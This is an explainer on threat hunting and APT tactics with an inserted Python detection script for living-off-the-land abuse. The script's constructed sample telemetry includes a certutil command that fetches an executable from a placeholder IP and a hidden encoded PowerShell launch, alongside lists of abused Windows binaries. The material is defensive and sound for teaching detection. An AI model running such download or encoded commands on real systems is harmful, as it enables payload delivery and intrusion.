Threat Hunting Aims

Digitization of commercial and governmental activities has become a major source of wealth and a key differentiator between organizations and their competitors. Attackers, pursuing economic, political and strategic goals, have accordingly developed increasingly sophisticated techniques to gain unauthorized access to confidential intellectual property.

New Techniques and Tactics Used in Cyberattacks

As companies and governments continue to expand into the digital world, there are stronger incentives to develop new, sophisticated strategies that bypass perimeter security solutions (firewalls, UTMs, SCMs, NGFWs, etc.) and endpoint ones (antivirus, EDR, NGAV, etc.) without being detected. New tactics used in cyberattacks include:

  • Recruitment of company employees (insiders) who make it easier to access IT systems.

  • Abusing legitimate tools already installed on IT systems (system utilities, scripting engines, administration binaries), which are trusted and therefore rarely flagged by security solutions. These are known as ‘living off the land’ techniques.

  • Use of social engineering to deceive an organization’s users and customers (phishing) so that they themselves open the way into its IT systems.

  • Use of multiple infection vectors to bypass an organization’s defenses, then lateral movement to a position from which high-value targets can be reached.
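
The ‘living off the land’ tactic above is the one that signature-based tools handle worst, because the binaries involved are legitimate and signed; what gives the attacker away is how they are invoked and by whom. The following is an added example, not code from the original page or from any product it describes: a minimal hunt over process-creation telemetry that flags a LOLBin handed a URL, an encoded PowerShell command, an Office application spawning a shell, and a bare rundll32. The pipe-delimited log format, the field names, the binary lists and the sample events are all constructed for this illustration.

```python
"""Minimal 'living off the land' hunt over process-creation telemetry.

The record format (ts|host|parent_image|image|command_line), the binary
lists and the sample events are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Signed Windows binaries attackers routinely repurpose (illustrative subset,
# not an exhaustive list).
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
           "bitsadmin.exe", "wmic.exe", "msiexec.exe", "cscript.exe", "wscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str   # parent image basename, lower-cased
    image: str    # image basename, lower-cased
    cmdline: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed record: ts|host|parent_image|image|command_line."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(ts, host, basename(parent), basename(image), cmdline)


def is_encoded_switch(arg: str) -> bool:
    """PowerShell accepts -EncodedCommand, any unambiguous prefix of it, -e and -ec."""
    a = arg.lower()
    return a in ("-e", "-ec") or (len(a) >= 3 and "-encodedcommand".startswith(a))


def hunt(ev: ProcEvent) -> List[str]:
    """Return the name of every hunting rule the event matches."""
    findings = []
    args = ev.cmdline.split()[1:]

    # Rule 1: a LOLBin given a URL (certutil -urlcache, mshta http://..., regsvr32 /i:http...).
    if ev.image in LOLBINS and URL_RE.search(ev.cmdline):
        findings.append("lolbin-remote-fetch")

    # Rule 2: PowerShell launched with an encoded command, the usual way to hide a one-liner.
    if ev.image == "powershell.exe":
        for i, a in enumerate(args[:-1]):
            if is_encoded_switch(a) and B64_RE.fullmatch(args[i + 1]):
                findings.append("encoded-powershell")
                break

    # Rule 3: an Office application spawning a shell or scripting host (macro/phishing chain).
    if ev.parent in OFFICE_APPS and ev.image in SHELLS:
        findings.append("office-spawns-shell")

    # Rule 4: rundll32 with no DLL to load; a common hollow host for injected code.
    if ev.image == "rundll32.exe" and not args:
        findings.append("rundll32-no-args")

    return findings


def hunt_events(lines) -> List[Tuple[str, str, str]]:
    """Run every rule over a batch of records; returns (ts, host, rule) triples."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        for rule in hunt(ev):
            hits.append((ev.ts, ev.host, rule))
    return hits


# Constructed sample telemetry (not real logs): a benign editor launch, a macro
# chain, a certutil download beside a legitimate certutil hash check, and a bare rundll32.
SAMPLE_EVENTS = [
    "2024-05-02T09:14:03Z|WKS-017|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\ana\\notes.txt",
    "2024-05-02T09:15:41Z|WKS-017|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "2024-05-02T09:16:02Z|WKS-017|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f http://198.51.100.23/up.txt C:\\Users\\Public\\up.exe",
    "2024-05-02T09:16:30Z|WKS-017|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -hashfile C:\\Users\\Public\\installer.msi SHA256",
    "2024-05-02T09:17:12Z|WKS-017|C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\rundll32.exe|rundll32.exe",
]

if __name__ == "__main__":
    for ts, host, rule in hunt_events(SAMPLE_EVENTS):
        print(f"{ts} {host} {rule}")
```

The fourth sample event matters as much as the hits: the same signed certutil.exe is used for a legitimate hash check and produces no finding, which is the point of hunting on invocation context rather than on the binary itself. In production, these rules would run against EDR or Sysmon process-creation events, and each hit would be a lead for the analyst to investigate, not a verdict.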

The spread of these advanced techniques and tactics has brought about a new category of attack: APTs, or Advanced Persistent Threats. These are targeted attacks with very specific goals. Because the malware they use is built for a single victim and rarely circulates widely, it is slow to appear in the signature files that security providers distribute for their traditional protection solutions. Such attacks thereby maximize the window of opportunity for reaching their targets.

For this reason, the ‘sit and wait’ approach of conventional security tools leaves APTs and similar threats undetected for a long time: exposure extends, on average, to 175 days from the start of an attack until it becomes visible and detectable. Often it is then left to law enforcement agencies or credit card companies to pick up the pieces, by which time the company’s reputation can be severely damaged.

The Response: Threat Hunting

Governments and corporations have identified this risk and have allocated larger budgets to creating specialized resources: a new group of professionals focused on detecting and repelling this type of cyberattack. Generally known as ‘threat hunters’, these professionals have the knowledge needed to detect new attack techniques and tactics, and use a new set of advanced tools to bolster the traditional security products already deployed by companies.

Threat hunting tools enable organizations’ SOCs to face their main challenges:

  • Difficulty finding qualified staff able to perform the tasks of an experienced security analyst.

  • The growing number of potentially dangerous situations companies face. This can exceed the SOC’s capacity and increase the chance that genuine alerts go uninvestigated for lack of time or resources.

  • The growing number of sophisticated tools required, and the absence of a single centralized solution that meets all of a SOC’s needs, call for highly integrated tools that deliver a cohesive, flexible software solution.

For this reason, companies and nations are forced to contemplate far larger budgets if they want to confront these new attacks and protect their intellectual property and credibility.